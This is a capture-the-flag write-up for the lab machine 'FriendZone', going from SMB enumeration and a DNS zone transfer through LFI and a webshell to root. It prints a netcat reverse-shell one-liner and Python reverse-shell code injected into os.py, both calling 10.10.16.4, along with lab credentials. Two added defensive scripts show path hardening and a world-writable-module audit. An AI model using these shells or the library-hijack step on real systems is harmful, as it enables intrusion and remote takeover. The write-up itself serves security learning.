```bash
rustscan 10.10.10.123
```


Let's run an nmap scan against the open ports.

```bash
nmap -sC -sV -p 21,22,53,80,139,443,445 10.10.10.123
```


Let's enumerate the SMB shares.

```bash
smbmap -H 10.10.10.123
```


Let's connect to the 'Development' share; we don't find anything useful there.

```bash
smbclient -N //10.10.10.123/Development
```

Next, try the 'general' share.

```bash
smbclient -N //10.10.10.123/general
```

Here we find admin credentials:


```
admin:WORKWORKHhallelujah@#
```

Let's enumerate subdomains by requesting a DNS zone transfer with 'dig'.

```bash
dig axfr friendzone.red @10.10.10.123
dig axfr friendzoneportal.red @10.10.10.123
```


Let's add these domains to our '/etc/hosts' file so they resolve.


On https at 'administrator1.friendzone.red' I see a login form; I use the 'admin:WORKWORKHhallelujah@#' credentials and can log in.

I am now on the Dashboard page.


Let's do some directory brute-forcing.

```bash
gobuster dir -u https://administrator1.friendzone.red -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php -k
```

Note: the `-k` option tells gobuster to skip TLS certificate verification.


Here, I found an LFI and see that


Let's read the source code of the application.


We can also grab the 'upload.php' file.
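The LFI used above to read the application's source is the classic "page include" bug: a user-supplied name is joined onto a directory and `../` walks out of it. The following is an added example, not code from the original writeup or from the FriendZone box, showing that bug class in a minimal Python form beside the hardened version a developer should ship. The directory layout (`pages/` plus a `config.php` one level up) is constructed for the demo and is an assumption, not the box's real layout.

```python
import os
import tempfile

PAGES_DIR_NAME = "pages"  # hypothetical layout; the real application's layout is not on the page


def include_vulnerable(base_dir, page):
    """The bug class: the user-controlled 'page' value is joined straight onto the
    pages directory, so '../' sequences walk out of it and any readable file can be
    pulled in. This is how application source leaks through a dashboard include."""
    with open(os.path.join(base_dir, page)) as f:
        return f.read()


def include_hardened(base_dir, page):
    """Resolve the requested path and refuse anything outside the pages directory
    or outside the allow-listed template extension."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page))
    # realpath collapses '..' and follows symlinks; commonpath then proves containment.
    # An absolute 'page' value replaces base in os.path.join, and is caught here too.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes the pages directory: %s" % page)
    if not target.endswith(".html"):
        raise PermissionError("only page templates may be included: %s" % page)
    with open(target) as f:
        return f.read()


def try_include(base_dir, page):
    """Return ('ok', content) or ('denied', reason) so the outcome can be checked."""
    try:
        return ("ok", include_hardened(base_dir, page))
    except PermissionError as exc:
        return ("denied", str(exc))


def build_demo_tree():
    """Constructed sample layout: one legitimate template plus a config file one level up."""
    root = tempfile.mkdtemp()
    pages = os.path.join(root, PAGES_DIR_NAME)
    os.mkdir(pages)
    with open(os.path.join(pages, "dashboard.html"), "w") as f:
        f.write("<h1>dashboard</h1>")
    with open(os.path.join(root, "config.php"), "w") as f:
        f.write("<?php $db_pass = 'constructed-secret'; ?>")
    return root, pages


if __name__ == "__main__":
    root, pages = build_demo_tree()
    print(include_vulnerable(pages, "../config.php"))  # source file leaks
    print(try_include(pages, "../config.php"))          # denied
    print(try_include(pages, "dashboard.html"))         # ok
```

The containment check must run on the resolved path, not on the raw string: filtering `../` textually misses absolute paths and symlinks, while `realpath` plus `commonpath` handles both.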


From the source code I see that I need to place my webshell in the SMB share I found earlier (we have write access to the 'Development' share).

I upload my webshell into the share.

```bash
smbclient -N //10.10.10.123/Development -c 'put cmd.php dr4ks.php'
```


I can execute commands via the web shell I uploaded into the SMB share.


Now it's time to pass a reverse shell to the command and get a shell.

Reverse shell payload (passed as a web-shell parameter, so the `&` in `2>&1` is URL-encoded as `%26`):

```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.16.4 1337 >/tmp/f
```


I spawn an interactive shell:

```bash
python -c 'import pty;pty.spawn("/bin/bash")'
```

then press Ctrl + Z and run:

```bash
stty raw -echo ; fg
```

and set the terminal variables:

```bash
export TERM=xterm
export SHELL=bash
```

I found clear-text credentials for the 'friend' user.


```
friend:Agpyu12!0.213$
```

user.txt


Here I see and investigate the '/opt/server_admin/reporter.py' file, which is run by root every 2 minutes (identified with the pspy64 tool).

Reading this file, the script uses the 'os' library to execute commands; because the library file it imports can be modified by our user, I can exploit this.


Let's append a reverse shell to the '/usr/lib/python2.7/os.py' file.

```python
import socket
import subprocess
import os

# Appended to the end of os.py: every script that imports os, including the
# root-run reporter.py, executes this block at import time.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.4", 1337))   # the listener used earlier
os.dup2(s.fileno(), 0)            # stdin, stdout and stderr go over the socket
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])
```
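The root cause of this privilege escalation is a standard-library module that a low-privilege user can write to while a root cron job imports it. The check below is an added example, not part of the original writeup or of the box, that a defender or auditor can run on a host: it walks the interpreter's import path and reports module files (or whole import directories) that are world-writable. The module list and the constructed demo directory are assumptions for the demonstration; on a real system the `__main__` section audits the interpreter it is run with.

```python
import os
import stat
import sys
import tempfile

# Modules the writeup's root-run reporter.py pulls in directly or transitively.
# Any of them, if writable, gives the same code-execution-as-root result.
WATCHED_MODULES = ("os.py", "subprocess.py", "socket.py")


def world_writable(path):
    """True if the mode grants write to 'other', the bit that lets an unprivileged
    user edit a file owned by root."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def find_writable_modules(search_paths, modules=WATCHED_MODULES):
    """Walk each import-path entry and report world-writable module files.
    A writable import directory is flagged too: dropping a new file that shadows
    a module is as effective as editing the module itself."""
    findings = []
    for base in search_paths:
        if not base or not os.path.isdir(base):
            continue
        if world_writable(base):
            findings.append((base, "import directory is world-writable"))
        for name in modules:
            candidate = os.path.join(base, name)
            if os.path.isfile(candidate) and world_writable(candidate):
                findings.append((candidate, "module file is world-writable"))
    return findings


def build_demo_tree():
    """Constructed sample library directory: a world-writable os.py beside a
    correctly permissioned subprocess.py, mirroring the misconfiguration on the box."""
    libdir = tempfile.mkdtemp()
    os.chmod(libdir, 0o755)
    for name, mode in (("os.py", 0o666), ("subprocess.py", 0o644)):
        path = os.path.join(libdir, name)
        with open(path, "w") as f:
            f.write("# placeholder module (constructed for the demo)\n")
        os.chmod(path, mode)
    return libdir


if __name__ == "__main__":
    # Audit the interpreter you are running; on a correctly installed system this prints nothing.
    for path, why in find_writable_modules(sys.path):
        print("%s: %s" % (path, why))
    # Then show the check catching the constructed misconfiguration.
    for path, why in find_writable_modules([build_demo_tree()]):
        print("%s: %s" % (path, why))
```

Run it with the same interpreter the privileged job uses (here that would be the system `python2.7`), since each interpreter has its own `sys.path`; the fix on the box is simply restoring root-only write permissions on the library directory and its files.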


root.txt
